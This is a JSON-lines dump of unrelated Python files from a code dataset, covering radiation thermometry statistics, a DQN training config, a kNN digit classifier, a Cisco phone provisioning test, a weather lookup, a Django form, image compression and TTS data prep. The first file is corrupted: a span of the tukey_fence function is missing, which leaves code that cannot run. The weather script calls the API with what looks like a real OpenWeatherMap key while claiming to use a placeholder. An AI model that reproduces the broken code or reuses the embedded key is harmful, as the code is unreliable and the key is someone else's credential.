SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n'''\nFile: compare_variance_approximations\n\nDesription: Calculate the variance and standard error with or without an \nasymptotic expansion.\n\nThis file generates Fig. 4 in our 2020 RSI Journal article.\n'''\n\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm, iqr\n\nC1 = 1.191e16 # W/nm4/cm2 Sr\nC2 = 1.4384e7 # nm K\n\ndef wien_approximation(wl,T,f_eps): \n '''\n Function: wien_approximation\n Calculates the Wien approximation to Planck's law for non-constant emissivity\n Inputs:\n - lnm: wavelength in nm\n - T: temperature in K\n - f_eps: a lambda function representing the emissivity as function of\n temperature and wavelength\n '''\n eps = f_eps(wl,T) # Emissivity\n \n return eps * C1 / wl**5 * np.exp(-C2/(T*wl))\n\ndef tukey_fence(Tvec, delta=31.3):\n '''\n Function: tukey_fence\n Descritpion: Removes outliers using Tukey fencing\n Inputs:\n - Tvec: some vector\n - delta: a fencing value above/below the third/first quartile, \n respectively. Values outside of [Q1 - delta * IQR, Q3 + delta*IQR] are\n discarded\n Outputs:\n - Average of vector w/o outliers\n - Standard deviation of vector w/o outliers\n - Standard error of vector w/o outliers (%)\n - Vector w/o outliers\n ''' \n ### Exclude data w/ Tukey fencing\n T_iqr = iqr(Tvec)\n T_qua = np.percentile(Tvec,[25,75])\n \n min_T = T_qua[0] - delta * T_iqr\n max_T = T_qua[1] + delta * T_iqr\n \n T_left = Tvec[(Tvec>min_T) & (Tvec 0:\n log_noisy = moving_average(log_noisy,wdw)\n \n # Rearrange the indices\n lwl_vec = wl_vec[wdwo2:-wdwo2]\n else:\n lwl_vec = np.copy(wl_vec)\n \n ### Index of the vectors\n vidx = np.arange(0,nwl,1)\n vidx = np.array(vidx,dtype=np.int64) \n \n ### Generate combinations\n cmb_pix = []\n \n for i,j in itertools.combinations(vidx,2):\n cmb_pix.append([i,j]) \n cmb_pix = np.array(cmb_pix)\n \n ### Which wavelengths are associated with the pixel combinations?\n wl_v0 = lwl_vec[cmb_pix[:,0]]\n wl_v1 = lwl_vec[cmb_pix[:,1]] \n \n ### Calculate intensity ratio\n logIi = log_noisy[cmb_pix[:,0]]\n logIj = log_noisy[cmb_pix[:,1]]\n \n logR = (logIi-logIj)\n \n # No emissivity error, so we can calculate eps1 and eps0 directly\n # from the given emissivity function\n eps0 = gr_eps(wl_v0,1)\n eps1 = gr_eps(wl_v1,1)\n \n invT = logR - 5 *np.log(wl_v1/wl_v0) - np.log(eps0/eps1)\n That = 1/invT\n That *= C2 * ( 1/wl_v1 - 1/wl_v0)\n \n # Filter out outliers\n Tave, Tstd, Tmetric, Tleft = tukey_fence(That)\n \n ### Average of all Thats is the estimate of the true temperature\n Tave = np.average(Tleft)\n \n ### Distributions\n Tbar_dist[idx] = (Tave - T0)/T0\n \n data['Icalc'] = np.copy(I_calc)\n data['noisy_data'] = np.copy(noisy_data)\n data['log_noisy'] = np.copy(log_noisy)\n data['cmb_pix'] = np.copy(cmb_pix)\n data['wl_v0'] = np.copy(wl_v0)\n data['wl_v1'] = np.copy(wl_v1)\n\n R = np.max(wl_v1)/np.min(wl_v0) - 1\n data['R'] = R\n data['lambda1'] = np.min(wl_v0)\n data['lambdaN'] = np.max(wl_v1)\n data['Nwl'] = nwl\n data['Nthat'] = (int)(nwl*(nwl-1)/2)\n data['T0'] = T0\n data['Tbar'] = np.copy(Tbar_dist)\n data['That'] = np.copy(That)\n \n return data\n\n\ndef compute_high_order_variance(sigma_I,T0,nwl,wdw,wdwo2,data): \n '''\n Calculates the variance from the successive Taylor expansions. We keep\n high orders for all of the expansions.\n Inputs:\n - T0: true temperature\n - sigma_I: standard variation on the measurement noise\n '''\n wl_v1 = data['wl_v1'] \n wl_v0 = data['wl_v0']\n I_calc = data['Icalc']\n cmb_pix = data['cmb_pix']\n \n # Number of combinations\n ncomb = len(wl_v1)\n \n ### Denominator average and variance for all wavelengths\n # mud, sigd\n mud = np.zeros(ncomb)\n logI = np.log(I_calc)\n \n # Filtering effect on mu_d\n logI = moving_average(logI,wdw)\n \n mud = logI[cmb_pix[:,0]] - logI[cmb_pix[:,1]]\n \n # No epsilon here: we assumed constant emissivity\n mud += - 5*np.log(wl_v1/wl_v0)\n \n sigd = np.ones_like(mud) * np.sqrt(2/wdw)*sigma_I\n mudmin = np.min(np.abs(mud))\n \n # sigma_d / mu_d\n ratio = np.unique(sigd) / mudmin\n ratio = np.abs(ratio)\n \n ### muThat, sigThat\n muThat = np.zeros_like(mud)\n sigThat = np.zeros_like(mud)\n \n # Teq\n Teq = C2*(1/wl_v1-1/wl_v0) / mud\n \n # Taylor expansion for muThat: we want to find the \"best\" order in the \n # expansion of the mean of 1/X\n sigomud = sigd/mud\n sigomud2 = sigomud**2\n \n muThat = Teq/T0 \n \n # Taylor expansion for sigThat: we keep only the first two orders\n sigThat = (Teq/T0)**2 * sigomud2 * (1 + 2*sigomud2)\n sigThat = np.sqrt(sigThat)\n \n ### muTbar, sigTbar\n # muTbar: subtract 1 bc. we want (Tbar-T0)/T0 = Tbar/T0 - 1\n muTbar = 1/ncomb * np.sum(muThat) - 1\n \n # sigTbar\n sigTbar = 1/ncomb**2 * np.sum(sigThat**2)\n sigTbar = np.sqrt(sigTbar)\n \n \n return muTbar,sigTbar,ratio,muThat,sigThat\n\n\n### Input parameters\nntbar = 1000 # Number of samples for Monte-Carlo\nT0 = 1500\nsigma_I = 0.01\nwdw = 1 # window size\nwdwo2 = (int)((wdw-1)/2)\n\n# Wavelengths\nwlRange = 1.46\n\n# Holder for results\nres = []\n\nfor lambda1 in np.array([300]):\n lambdaN = (1+wlRange) * lambda1\n \n ### Approximate the starting point \n sigd = np.sqrt(2/wdw) * sigma_I\n rlim = 0.1\n Napprox = 1\n Napprox += C2 / (T0*lambda1) * wlRange / (1+wlRange)**2 * rlim / sigd\n \n nwl_array = np.arange(10,100,10)\n nwl_array = np.array(nwl_array,dtype=np.int64)\n print(\"Napprox = \", Napprox)\n\n for idx,nwl in enumerate(nwl_array):\n \n if np.mod(idx,10) == 0:\n print(idx)\n \n wl_vec = np.linspace(lambda1,lambdaN,nwl) \n \n dlambda = np.abs(wl_vec[0]-wl_vec[1])\n \n # Add window for moving average\n wl_vec = np.linspace(lambda1 - wdwo2 * dlambda, \n lambdaN + wdwo2 * dlambda, \n nwl + wdw - 1)\n \n ### Create some data\n data = generate_Taverage_distribution(sigma_I, \n T0,\n wl_vec,\n nwl,\n wdw,\n wdwo2,\n ntbar)\n muds,sigds = norm.fit(data['Tbar'])\n \n ### Calculate the variance based on the second-order accurate expansions\n muAcc, sigAcc, ratio, muThat, sigThat = compute_high_order_variance(sigma_I,T0,nwl,wdw,wdwo2,data)\n \n res.append([C2/(T0*lambda1), # 0\n nwl, # 1 \n dlambda, # 2\n ratio, # 3 \n sigds, # 4\n sigAcc, # 5\n muds * 100, # 6\n muAcc * 100]) # 7\n\nres = np.array(res)\n\nfig, ax = plt.subplots(2,1)\n\nax[0].vlines(Napprox,np.min(res[:,5]),np.max(res[:,5]),linestyles='--')\nax[0].plot(res[:,1],res[:,4],'^')\nax[0].plot(res[:,1],res[:,5])\nax[0].set_ylabel(\"Standard deviation\")\n\nax[1].plot(res[:,1],res[:,6],'^')\nax[1].plot(res[:,1],res[:,7])\nax[1].set_ylabel(\"Error of the mean (%)\")","sub_path":"article/compare_variance_approximation.py","file_name":"compare_variance_approximation.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"553277611","text":"from rllab.algos.dqn_2 import DQN\nfrom rllab.envs.box2d.cartpole_env import CartpoleEnv\nfrom rllab.envs.normalized_env import normalize\nimport gym\n\nenv_name = 'Breakout-v0'\nenv = gym.make(env_name)\n\nalgo = DQN(\n env=env,\n env_name=env_name,\n frame_width=84, # Resized frame width\n frame_height=84, # Resized frame height\n num_episodes = 12000, # Number of episodes the agent plays\n state_length = 4, # Number of most recent frames to produce the input to the network\n gamma = 0.99, # Discount factor\n exploration_steps = 1000000, # Number of steps over which the initial value of epsilon is linearly annealed to its final value\n initial_epsilon = 1.0, # Initial value of epsilon in epsilon-greedy\n final_epsilon = 0.1, # Final value of epsilon in epsilon-greedy\n initial_replay_size = 20000, # Number of steps to populate the replay memory before training starts\n num_replay_memory = 400000, # Number of replay memory the agent uses for training\n batch_size = 32, # Mini batch size\n target_update_interval = 10000, # The frequency with which the target network is updated\n train_interval = 4, # The agent selects 4 actions between successive updates\n learning_rate = 0.00025, # Learning rate used by RMSProp\n momentum = 0.95, # Momentum used by RMSProp\n min_grad = 0.01, # Constant added to the squared gradient in the denominator of the RMSProp update\n save_interval = 300000, # The frequency with which the network is saved\n no_op_steps = 30, # Maximum number of \"do nothing\" actions to be performed by the agent at the start of an episode\n load_network = False,\n save_network_path = './saved_networks/' + env_name,\n save_summary_path = './summary/' + env_name,\n)\nalgo.train()\n","sub_path":"examples/dqn_2.py","file_name":"dqn_2.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"175866424","text":"from kNN.kdTree import kdtree\nimport kNN\nimport numpy as np\n\nx1=[]\ny1=[]\nnums=[189, 198, 195, 199, 186, 187, 195, 201, 180, 204]\nfile=\"C:\\\\Users\\\\45530\\\\Desktop\\\\ml code\\\\MLiA_SourceCode\\\\machinelearninginaction\\\\Ch02\\\\digits\\\\trainingDigits\\\\\"\n\nfor i in range(10):\n for j in range(nums[i]):\n num_arr=[]\n filename=file+\"{}_{}.txt\".format(i,j)\n with open(filename, 'r') as file_to_read:\n while True:\n line=file_to_read.readline()\n if not line:\n break\n line=line[:len(line)-1]\n t=[float(i) for i in line]\n num_arr.append(t)\n num_arr=np.array(num_arr)\n num_arr=num_arr.flatten()\n x1.append(list(num_arr))\n y1.append(i)\n \nx1=np.array(x1)\ny1=np.array(y1)\n\nx2=[]\ny2=[]\nnums=[87, 97, 92, 85, 114, 108, 87, 96, 91, 89]\nfile=\"C:\\\\Users\\\\45530\\\\Desktop\\\\ml code\\\\MLiA_SourceCode\\\\machinelearninginaction\\\\Ch02\\\\digits\\\\testDigits\\\\\"\n\nfor i in range(10):\n for j in range(nums[i]):\n num_arr=[]\n filename=file+\"{}_{}.txt\".format(i,j)\n with open(filename, 'r') as file_to_read:\n while True:\n line=file_to_read.readline()\n if not line:\n break\n line=line[:len(line)-1]\n t=[float(i) for i in line]\n num_arr.append(t)\n num_arr=np.array(num_arr)\n num_arr=num_arr.flatten()\n x2.append(list(num_arr))\n y2.append(i) \nx2=np.array(x2)\ny2=np.array(y2)\n\nsum=len(x2)\ncorrect=0\nwrong=0\nk=5\n\nT=kdtree(x1,y1)\nT.kdtreeinit(T.root,0)\n\nfor i in range(len(x2)):\n res=T.knn_predict(k,x2[i])\n if res==y2[i]:\n correct+=1\n else:\n wrong+=1\n print(\"{}-th is predicted as {}, actually is {}\".format(i,res,y2[i]))\nprint(\"correct rate is {:.2f}%\".format(correct/sum*100))\n \n\n\n\n","sub_path":"kNN/knn_digit.py","file_name":"knn_digit.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"159912158","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nName:\n cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py\n\nReferences:\n Tph10164330c\n Tph10163009c\n Tph10162951c\n\nPurpose:\n To test the resync using different methods in DUAL Mode\n with IPv6 address\n\nAuthor:\n yuzho2@cisco.com\n\nReferences:\n US20528\n\nDescription:\n TFTP Resync:\n To verify if the resync is successful using TFTP through\n web profile rule.\n\n HTTP Resync:\n To verify if the resync is successful using HTTP through\n web profile rule.\n\n HTTPS Resync:\n To verify if the resync is successful using HTTPS through\n web profile rule.\n\nTopology:\n 1 One Phone\n 2 tftp server\n 3 http server\n 4 https server\n\nPass/Fail Criteria:\n TFTP Resync:\n Resync should happen successfully and the desired parameter change\n has to happen correctly.\n\n HTTP Resync:\n Resync should happen successfully and the desired parameter change\n has to happen correctly.\n\n HTTPS Resync:\n 1. Verify that custom ca file is installed successfully\n 2. Resync should happen successfully and the desired parameter change\n has to happen correctly.\n\nTest Steps:\n TFTP Resync:\n # Test Steps:\n 1. Set the phone to idle state\n 2. Create a resync file with the desired parameter to be changed\n and its value (For Eg: Resync Periodic as in this script)\n 3. Upload the resync file to tftp server\n 4. Set the profile rule in the phone web page.\n 5. Check that the value of the parameter has changed and\n then revert it back to the default value.\n\n HTTP Resync:\n # Test Steps:\n 1. Set the phone to idle state\n 2. Create a resync file with the desired parameter to be changed\n and its value (For Eg: Resync Periodic as in this script)\n 3. Upload the resync file to http server\n 4. Set the profile rule in the phone web page.\n 5. Check that the value of the parameter has changed and\n then revert it back to the default value.\n\n HTTPS Server:\n # Test Steps:\n 1. Set the phone to idle state\n 2. Install custom ca on phone by giving a valid Custom CA Rule\n from phone web page.\n 3. Verify that custom ca installation is successful.\n 4. Create a resync file with the desired parameter to be changed\n and its value (For Eg: Resync Periodic as in this script)\n 5. Upload the resync file to https server\n 6. Set the profile rule in the phone web page.\n 7. Check that the value of the parameter has changed and\n then revert it back to the default value.\n\nNotes:\n This script uses env variable \"domain_name\" as IPv6 addr for tftp and http\n e.g.\n [http]\n domain_name=[2009:10:74:121:8da5:9e2d:f155:1c2]\n\nKnown Bugs:\n\n\"\"\"\n\nimport tng\nimport logging\nfrom tng.api import concurrent\nimport os\nimport re\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nfrom tng_sl.contrib.mpp.phone.ProvToolkit import ProvToolkit\nfrom tng.frontend.timing import wait\nfrom tng.frontend.timing import until\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\n\nlog = logging.getLogger('Resync_IPv6')\n\n\nclass Resync_IPv6(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (PhoneConfigHelper,)\n helper_num_devices = 1\n\n @classmethod\n def setUpClass(cls):\n log.info(\"Start of setUpClass\")\n\n cls.RESYNC_PERIODIC_VALUE = \"20\"\n cls.DEFAULT_VALUE = \"40\"\n\n cls.tftp_prov = ProvToolkit(\"tftp\")\n cls.http_prov = ProvToolkit(\"http\")\n cls.https_prov = ProvToolkit(\"https\")\n\n log.info(\"Create xml file\")\n cls.resync_file_name = 'prov_periodic.xml'\n cls.resync_file_full_path = os.path.join(\n str(tng.api.get_logdirectory()), cls.resync_file_name)\n cls.toolkit.create_resync_xml_file(\n cls.resync_file_full_path,\n {\"Resync_Periodic\": cls.RESYNC_PERIODIC_VALUE})\n\n log.info(\"save phones'config and set phone idle\")\n # save phones' config and set phone to idle\n concurrent([\n cls.oPhone1.ui.save_config,\n cls.oPhone1.phone_set_idle])\n\n log.info(\"Set IP_Mode to Dual Mode\")\n cls.oPhone1.ui.set_param_value({'IP Mode': 'Dual Mode'})\n\n log.info(\"End of setUpClass\")\n\n def test_tftp_resync(self):\n\n log.info(\"Start test tftp resync\")\n tftp_resync_rule = self.tftp_prov.setup_provisioning_env(\n self.resync_file_full_path)\n tftp_rule = tftp_resync_rule['rule']\n tftp_ipv6 = 'tftp://[{}]/'.format(\n self.toolkit.get_test_env_info(\n section='tftp', parameter_name='ipv6'))\n pattern = 'tftp://(.*?)/'\n tftp_rule = re.sub(pattern, tftp_ipv6, tftp_rule)\n log.info(\"Set the tftp rule in web page\")\n self.oPhone1.ui.set_param_value({\"Profile Rule\": tftp_rule})\n\n self.oPhone1.ui.check_automation_ready(wait_reboot=15)\n\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.RESYNC_PERIODIC_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Resync did not succeed over TFTP')\n\n log.info(\"TFTP resync successful, end of test tftp resync\")\n\n def test_http_resync(self):\n\n log.info(\"Start test http resync\")\n http_resync_rule = self.http_prov.setup_provisioning_env(\n self.resync_file_full_path, use_domain=False)\n http_rule = http_resync_rule['rule']\n\n http_ipv6 = 'http://[{}]/'.format(\n self.toolkit.get_test_env_info(\n section='http', parameter_name='ipv6'))\n pattern = 'http://(.*?)/'\n http_rule = re.sub(pattern, http_ipv6, http_rule)\n log.info(\"http rule is %s\" % http_rule)\n\n log.info(\"Set the http rule in web page\")\n self.oPhone1.ui.set_param_value({\"Profile Rule\": http_rule})\n\n self.oPhone1.ui.check_automation_ready(wait_reboot=15)\n\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.RESYNC_PERIODIC_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Resync did not succeed over HTTP')\n\n log.info(\"HTTP resync successful, end of test HTTP resync\")\n\n def test_https_resync(self):\n\n log.info(\"Start test https resync\")\n primary_dns = self.toolkit.get_test_env_info(\n section=\"other\", parameter_name=\"primary_dns\")\n\n https_resync_rule = self.https_prov.setup_provisioning_env(\n self.resync_file_full_path)\n https_rule = https_resync_rule['rule']\n https_domain_v6 = 'https://{}/'.format(\n self.toolkit.get_test_env_info(\n section='https', parameter_name='domain_name_ipv6'))\n\n pattern = 'https://(.*?)/'\n https_rule = re.sub(pattern, https_domain_v6, https_rule)\n log.info(\" https rule :{}\".format(https_rule))\n log.info(\"Set Primary DNS\")\n self.oPhone1.ui.set_web_parameter_by_resync(\n Primary_DNS=['Primary_DNS', primary_dns])\n\n self.assertEqual(\n self.oPhone1.get_web_config('Primary_DNS')[0],\n primary_dns,\n \"Set Primary DNS fail\")\n\n log.info(\"Set the https rule in web page\")\n self.oPhone1.ui.set_param_value({\"Profile Rule\": https_rule})\n # after set profile rule, phone will do resync after a long time\n self.oPhone1.ui.check_automation_ready(wait_reboot=30)\n\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.RESYNC_PERIODIC_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Resync did not succeed over HTTPS')\n\n log.info(\"HTTPS resync successful, end of test HTTPS resync\")\n\n def tearDown(self):\n log.info(\"Start of tearDown method\")\n log.info(\"Revert the parameter back to default value\")\n self.oPhone1.ui.set_param_value({\n \"Profile Rule\": '',\n \"Resync Periodic\": self.DEFAULT_VALUE})\n wait(5, 'set take effect')\n self.assertEqual(\n self.oPhone1.ui.get_param_value('Resync Periodic'),\n self.DEFAULT_VALUE)\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.DEFAULT_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Revert the parameter fail!!!!')\n self.oPhone1.phone_set_idle()\n log.info(\"End of tearDown method\")\n\n @classmethod\n def tearDownClass(cls):\n log.info(\"Start of tearDownClass\")\n cls.http_prov.clean_provisioning_env()\n cls.https_prov.clean_provisioning_env()\n cls.tftp_prov.clean_provisioning_env()\n cls.oPhone1.ui.recover_config()\n log.info(\"End of tearDownClass\")\n\n\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/Provisioning/cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py","file_name":"cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"601378451","text":"#! python3\n# This program prints the current weather and the temperature (in degree Celsius) for a location from the command line.\n\nimport json, requests, sys\n\nAPI_key = \"XXXXXXXXXXXXXXXXXXXXX\" # your API key provided from openweathermap.org\n\nif len(sys.argv)>1:\n city = \"\".join(sys.argv[1:])\nelse:\n print(\"Usage: enter the city name to report you with\"\n \" the weather in that city for the next three days\")\n sys.exit()\n\nwebsitePage = requests.get(f\"http://api.openweathermap.org/data/2.5/weather?q={city}&APPID=985e65c7cc9580ca510e30af61d2f5ac\")\njson_text = websitePage.text\npython_code = json.loads(json_text)\n\nif \"city not found\" in json_text:\n print(\"city's name is invalid\")\nelse:\n weather = python_code['weather'][0]['description']\n temp = int(python_code['main']['temp']) - 273.15 # from Kelvin to Celsius\n print(f\"in {city}\\n\"\n '============================\\n'\n f\"the weather: {weather}\\n\"\n f\"current temperature is {temp:.2f}\\n\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"53192127","text":"from django import forms\n\nfrom .models import Cliente\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model=Cliente\n fields=['nombres','apellidos','tipo',\n 'celular','estado']\n exclude = ['um','fm','uc','fc']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\n def clean(self):\n try:\n sc = Cliente.objects.get(\n descripcion=self.cleaned_data[\"descripcion\"].upper()\n )\n\n if not self.instance.pk:\n print(\"Registro ya existe\")\n raise forms.ValidationError(\"Registro Ya Existe\")\n elif self.instance.pk!=sc.pk:\n print(\"Cambio no permitido\")\n raise forms.ValidationError(\"Cambio No Permitido\")\n except Cliente.DoesNotExist:\n pass\n return self.cleaned_data","sub_path":"CERBEUS_v1_5/fac/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"18072870","text":"def compress_part(image):\n\t\"Compresses as part of bigger image\"\n\tpass\n\ndef get_difference(a, b):\n\treturn (a[0]-b[0])**2+(a[1]-b[1])**2+(a[2]-b[2])**2\n\ndef get_splits(image, width, height, block_width, block_height, DISPERSION_MAX, DIFFERENCE_MAX):\n\tblocks_w = int(width/block_width)\n\tblocks_h = int(height/block_height)\n\tblocks = [[None for i in range(blocks_w)] for j in range(blocks_h)]\n\t\n\tfor i in range(blocks_h):\n\t\tfor j in range(blocks_w):\n\t\t\tpos_i = i * block_height\n\t\t\tpos_j = j * block_width\n\t\t\tblocks[i][j] = image[pos_i:(pos_i+block_height if i != blocks_h else height)][pos_j:(pos_j+block_width if j != blocks_w else width)]\n\n\t#Here we save mean values of color in each block if it good for compression\n\tblocks_means = [[None for i in range(blocks_w)] for j in range(blocks_h)]\n\n\t#This cycle takes most part of time to execute\n\tfor block_i in range(blocks_h):\n\t\tfor block_j in range(blocks_w):\n\t\t\tblock = blocks[block_i][block_j]\n\t\t\tmean = [0, 0, 0]\n\n\t\t\tfor i in range(len(block)):\n\t\t\t\tfor j in range(len(block[0])):\n\t\t\t\t\tmean[0] += block[i][j][0]\n\t\t\t\t\tmean[1] += block[i][j][1]\n\t\t\t\t\tmean[2] += block[i][j][2]\n\n\t\t\tarea = block_width * block_height\n\t\t\tmean[0], mean[1], mean[2] = mean[0]/area, mean[1]/area, mean[2]/area\n\n\t\t\t#Dispersion shows us how color varies in block\n\t\t\tdispersion = 0\n\t\t\tfor i in range(len(block)):\n\t\t\t\tfor j in range(len(block[0])):\n\t\t\t\t\tdispersion += (block[i][j][0] - mean[0])**2 + (block[i][j][1] - mean[1])**2 + (block[i][j][2] - mean[2])**2\n\t\t\tdispersion /= area\n\n\t\t\tif dispersion <= DISPERSION_MAX:\n\t\t\t\tblocks_means[block_i][block_j] = mean\n\t#By labeling same blocks we could find grid\n\tblocks_labels = [[-1 for i in range(blocks_w)] for j in range(blocks_h)]\n\tnew_label = 0\n\n\tfor block_i in range(blocks_h):\n\t\tfor block_j in range(blocks_w):\n\n\t\t\tif blocks_means[block_i][block_j] != None:\n\t\t\t\t#If block doesnt exist or not chosen than we get infinity(that cannot pass next condintion)\n\t\t\t\tdl = get_difference(blocks_means[block_i][block_j], blocks_means[block_i][block_j-1]) if block_j-1>=0 and blocks_means[block_i][block_j-1] != None else float('+inf')\n\t\t\t\tdd = get_difference(blocks_means[block_i][block_j], blocks_means[block_i-1][block_j]) if block_i-1>=0 and blocks_means[block_i-1][block_j] != None else float('+inf')\n\n\t\t\t\tif dl <= DIFFERENCE_MAX and dd <= DIFFERENCE_MAX:\n\t\t\t\t\tif dl < dd:\n\t\t\t\t\t\tblocks_labels[block_i][block_j] = blocks_labels[block_i][block_j-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tblocks_labels[block_i][block_j] = blocks_labels[block_i-1][block_j]\n\t\t\t\telse:\n\t\t\t\t\tblocks_labels[block_i][block_j] = new_label\n\t\t\t\t\tnew_label += 1\n\n\tsplits_w, splits_h = [], []\n\tforward_labels = [False for i in range(new_label)]\n\tbackward_labels = [False for i in range(new_label)]\n\n\tfor block_i in range(blocks_h):\n\t\tfor block_j in range(blocks_w):\n\t\t\t#From left up to right down to find first appearence of label\n\t\t\tlabel = blocks_labels[block_i][block_j]\n\t\t\tif label != -1 and not forward_labels[label]:\n\t\t\t\tsplits_w.append(block_j * block_width)\n\t\t\t\tsplits_h.append(block_i * block_height)\n\t\t\t\tforward_labels[label] = True\n\n\t\t\t#From right down to left up to find last appearence of label\n\t\t\tback_block_i = blocks_h - block_i - 1\n\t\t\tback_block_j = blocks_w - block_j - 1\n\t\t\tlabel = blocks_labels[back_block_i][back_block_j]\n\t\t\tif label != -1 and not backward_labels[label]:\n\t\t\t\tsplits_h.append(back_block_i * block_height)\n\t\t\t\tsplits_w.append(back_block_j * block_width)\n\t\t\t\tbackward_labels[label] = True\n\n\tsplits_w = sorted(list(set([split for split in splits_w])))\n\tsplits_h = sorted(list(set([split for split in splits_h])))\n\n\treturn splits_w, splits_h\n\ndef compress(image, width, height, block_width, block_height, DISPERSION_MAX, DIFFERENCE_MAX):\n\tsplits_w, splits_h = get_splits(image, width, height, block_width, block_height, DISPERSION_MAX, DIFFERENCE_MAX)\n\tparts = [[image[split_h:split_h+block_height][split_w:split_w:split_w+block_width] for split_w in splits_w] for split_h in splits_h]\n\tcomp_parts = [[compress_part(parts[i][j]) for j in range(len(splits_w))] for i in range(len(splits_h))]\n\t#Need to define how split parts\n\tres = \"|\".join(map(\"|\".join, comp_parts))\n\treturn res","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"257893680","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport csv\n\n\ndef read_data( source_dir ):\n utt=[]\n str=[]\n fpath=[]\n with open(os.path.join(source_dir, 'all.txt'), 'r') as f:\n reader = csv.reader(f, delimiter='|')\n max_rows = 30000\n skipped = 0\n for row in reader:\n filepath = os.path.join(source_dir, row[1])\n if( len(row[2]) > 40 and os.path.getsize(filepath)>40000 ):\n utt.append(row[0])\n fpath.append(filepath)\n str.append(row[2])\n max_rows-=1\n if max_rows<=0:\n break\n else:\n skipped += 1\n print(\"\\n\\nSkipped: %d\\n\\n\"%skipped)\n return (utt,fpath,str)\n\ndef save_data(a, utt, fpath, str):\n with open(a.text, 'w') as f:\n for u, s in zip(utt, str):\n f.write('%s %s\\n'%(u,s))\n\n with open(a.scp, 'w') as f:\n for u, fp in zip(utt, fpath):\n f.write('%s %s\\n' % (u, fp))\n\n with open(a.spk2utt, 'w') as f:\n f.write(\"LJ \")\n for u in utt:\n f.write('%s '%(u))\n f.write(\"\\n\")\n\n with open(a.utt2spk, 'w') as f:\n for u in utt:\n f.write('%s LJ\\n' % (u))\n\n\ndef main():\n print('Initializing Training Process..')\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--scp', default=\"data/train/wav.scp\")\n parser.add_argument('--utt2spk', default='data/train/utt2spk')\n parser.add_argument('--spk2utt', default='data/train/spk2utt')\n parser.add_argument('--text', default='data/train/text')\n parser.add_argument('--source-dir', default='/mnt/local/TrainingData/Blizzard2013_Aligned/')\n\n a = parser.parse_args()\n\n (utt, fpath, str) = read_data(a.source_dir)\n save_data(a, utt, fpath, str)\n\nif __name__ == '__main__':\n main()","sub_path":"egs2/blizzard2013/tts1/local/process_bliz.py","file_name":"process_bliz.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"326848154","text":"from typing import List\nimport pandas as pd\n\nBASE_URL = \"https://www.leveropen.com/api/\"\nVERSION = \"v1\"\nDATE_FORMAT = \"%Y-%m-%d\"\nDATASET_FILTER_TYPES = [\"name\", \"collection\", \"topic\"]\n\n\ndef parse_categories(categories: List[dict]):\n return pd.concat(\n [\n pd.DataFrame(data=category, index=[idx])\n for idx, category in enumerate(categories)\n ]\n )\n","sub_path":"leveropen/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"326935686","text":"\"\"\"\nEscreva um programa que leia dois números inteiros e 